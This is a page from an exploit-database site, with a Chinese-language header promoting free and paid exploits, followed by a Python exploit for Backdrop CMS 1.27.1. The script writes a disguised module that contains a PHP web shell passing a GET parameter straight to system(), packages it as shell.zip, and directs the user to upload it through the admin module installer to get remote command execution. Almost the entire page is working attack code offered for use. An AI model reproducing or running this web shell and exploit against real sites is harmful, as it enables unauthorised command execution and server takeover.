0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip # Version: latest # Tested on: MacOS import os import time import zipfile def create_files(): info_content = """ type = module name = Block description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 """ shell_info_path = "shell/shell.info" os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü oluşturur with open(shell_info_path, "w") as file: file.write(info_content) shell_content = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ shell_php_path = "shell/shell.php" with open(shell_php_path, "w") as file: file.write(shell_content) return shell_info_path, shell_php_path def create_zip(info_path, php_path): zip_filename = "shell.zip" with zipfile.ZipFile(zip_filename, 'w') as zipf: # Dosyaları shell klasörü altında sakla zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php') return zip_filename def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + "/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python script.py [url]") else: main(sys.argv[1]) # 0day.today [2024-06-30] #